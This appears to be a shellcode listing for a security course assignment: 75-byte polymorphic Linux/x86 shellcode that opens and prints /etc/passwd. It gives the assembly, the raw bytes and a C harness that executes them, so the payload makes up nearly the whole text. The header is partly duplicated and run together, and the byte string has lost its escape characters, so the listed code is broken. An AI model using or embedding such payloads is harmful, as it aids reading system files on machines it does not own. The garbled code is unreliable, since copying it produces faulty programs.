# Author: Xenofon Vassilakopoulos
# Date: 2020-01-09
# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 # Title: Linux/x86 - Tiny Read Polymorphic Shellcode (75 bytes)
# Author: Xenofon Vassilakopoulos
# Date: 2020-01-09
# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
# Blog: https://xenovass.wordpress.com/2019/06/26/slae-assignment-6-create-polymorphic-shellcode/
# Architecture: i686 GNU/Linux
# Shellcode Length: 75 bytes
# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-842.php
# SLAE-ID: SLAE - 1314
# Description: polymorphic version of tiny read shellcode that reads /etc/passwd
----------------------------------- Assembly -------------------------------------
global _start
section .text
_start:
shr ecx, 16
mul ecx
mov al, 5
mov dword [esp-4], ecx
mov dword [esp-8], 0x64777373
mov dword [esp-0ch], 0x61702f63
mov dword [esp-10h], 0x74652f2f
sub esp, 10h
mov ebx, esp
mov dx, 0x1bc
int 0x80
mov ecx, ebx
mov ebx, eax
mov al, 3
mov dx, 0xffe
inc dx
int 0x80
xor eax, eax
mov al, 4
sub bl, 2
int 0x80
xor eax, eax
inc al
int 0x80
----------------------------------- Shellcode -------------------------------------
#include <stdio.h>
#include <string.h>
unsigned char code[] =
"xc1xe9x10xf7xe1xb0x05x89x4cx24xfcxc7"
"x44x24xf8x73x73x77x64xc7x44x24xf4x63"
"x2fx70x61xc7x44x24xf0x2fx2fx65x74x83"
"xecx10x89xe3x66xbaxbcx01xcdx80x89xd9"
"x89xc3xb0x03x66xbaxfex0fx66x42xcdx80"
"x31xc0xb0x04x80xebx02xcdx80xc1xe8x10"
"xfexc0xcdx80";
main()
{
printf("Shellcode Length: %d ", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}